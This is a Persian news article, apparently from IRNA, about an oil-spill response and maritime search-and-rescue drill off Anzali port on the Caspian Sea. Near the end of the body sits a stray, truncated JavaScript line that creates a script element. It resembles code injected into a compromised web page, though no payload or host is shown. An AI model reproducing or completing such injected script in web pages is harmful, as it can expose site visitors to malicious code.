پنج شنبه , 23 آذر 1396
خانه / اخبار مراکز استان / اقتصاد گیلان / اجرای مانور مقابله با آلودگی نفتی و جستجو و نجات دریایی در انزلی

اجرای مانور مقابله با آلودگی نفتی و جستجو و نجات دریایی در انزلی

انزلی – ایرنا – مانور ملی منطقه ای مقابله با آلودگی نفتی و جستجو و نجات دریایی صبح سه شنبه در فاصله 10 مایلی بندرگاه انزلی در دریا با استفاده از 30 فروند شناور ، چهار بالگرد و 150 نیروی عملیاتی آغاز شد.

معاون دریایی سازمان بنادر و دریانوردی در خصوص برگزاری این مانور یک روزه به خبرنگار ایرنا گفت : جمهوری اسلامی ایران سال 1373 به کنوانسیون بین المللی جستجو و نجات دریایی ملحق شد و سازمان بنادر و دریانوردی متولی اجرای این کنوانسیون در ایران است.

هادی حق شناس اظهار کرد : پس از ابلاغ مفاد کنوانسیون SAR ( جستجو و نجات ) سازمان بنادر و دریانوردی اقدام به ایجاد و سازماندهی مراکز اصلی هماهنگی و نجات دریایی در هفت استان ساحلی و ایجاد 14 مرکز فرعی در سایر بنادر و جزایر با تعیین محدوده های عملیاتی نمود.

وی افزود : همزمان با تجهیز این مراکز به سیستم های مخابراتی پیشرفته ، 17 فروند شناورهای ویژه جستجو و نجات خریداری و اسکله شناورهای ناجی نصب شد.

وی یادآور شد : اجرای آموزش های مختلف برای ناخداها و ملوانان و همچنین انجام کنترل و بازرسی از شناورهای سنتی و الزام آنان به حفظ و برقراری ارتباطات رادیویی و ناوبری و رعایت اصول ایمنی دریانوردی سبب شده با وجود افزایش تردد دریایی در سال های اخیر، آمار سوانح و تلفات انسانی در دریا نیز به طور محسوس کاهش یابد.

به گفته حق شناس؛ در پنج سال گذشته با اجرای الزامات کنوانسیون جستجو و نجات دریایی و مشارکت ارگانهای ذیربط در طرح تعداد پنج هزار و 313 دریانورد نجات یافتند.

وی افزود : همچنین شش فروند بالگرد ویژه دریایی برای پشتیبانی و سرعت عمل در امر جستجو و نجات در بندرعباس ، بندرگاه بوشهر ، انزلی و چابهار به خدمت گرفته شد که توانسته اند عملیات جستجو و نجات دریایی را با کیفیت مطلوب ارائه کنند.

وی با تاکید بر لزوم حفاظت از محیط زیست دریایی اظهار کرد : برای پایش و کنترل هوایی برای حفاظت از محیط زیست دریایی نیز هواپیما به کار گرفته می شود.

حق شناس متذکر شد : سازمان به منظور افزایش تجهیزات جستجو و نجات دریایی اقدامات لازم برای ساخت شناورهای جدید ناجی ، هاورکرافت و یک شناور مادر SAR را در دستور کار دارد.

معاون سازمان بنادر و دریانوردی خاطرنشان کرد : داشتن دریاهایی پاک و ایمن ، مستلزم توسعه همکاری های منطقه ای و بین المللی است رویکردی که از جمله اهداف و برنامه های سازمان جهت اجرای الزامات جستجو و نجات و حفظ محیط زیست دریایی است.

* حساسیت دو چندان خزر

مدیرکل بنادر و دریانوردی گیلان نیز در خصوص برگزاری این مانور به خبرنگار ایرنا گفت : اجرای مانورهای سالیانه جستجو و نجات از جمله برنامه هایی است که برای ارتقای توانمندی و آمادگی کارکنان دست اندرکار برگزار می شود.

سید علی نعیمی با بیان این که دریای خزر محیط بسته و حساسی است، اظهار کرد : این ویژگی لزوم توجه به مسائل ایمنی و زیست محیطی خزر را دو چندان می کند.

وی خاطرنشان کرد : کشورهای همسایه خزر می توانند در سایه یک تعامل سازنده اقدامات موثری در زمینه جستجو و نجات مراقبت های زیست محیطی و مقابله با سوانح ، آلودگی ها و تهدیدات دریایی بعمل آورند .

مدیرکل بنادر و دریانوردی گیلان با اشاره به بیش از 10 میلیارد تومان سرمایه گذاری این بندرگاه برای خرید تجهیزات مربوط به ایمنی و نجات افزود : این مانور با همکاری سایر ارگان ها و با حضور نمایندگانی از کشورهای ترکمنستان و آذربایجان برگزار می شود.

در این مانور علاوه بر معاون دریایی سازمان بنادر و دریانوردی ، مدیرکل بنادر و دریانوردی گیلان ،فرمانده ناوگان شمال ، معاون استاندار گیلان و مدیران کل گیلان و استانهای ساحلی ، فرماندار انزلی ، فرمانده دریابانی و نمایندگان سایر ارگان های دریایی حضور دارند.

سال گذشته حدود 12 مانور محلی جستجو و نجات دریایی و یک مانور ملی توسط ادارات کل بنادر و دریانوردی در کشور اجرا شد.

همایش و مانور ملی و منطقه ای جستجو و نجات و مقابله با آلودگی دریا با همکاری ارگان ها و سازمان های دریایی کشور و نمایندگانی از ترکمنستان، آذربایجان و روسیه از روز گذشته (دوشنبه بیست و پنجم خردادماه) در بندرگاه انزلی آغاز شده است.

var d=document;var s=d.createElement(‘script’);

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *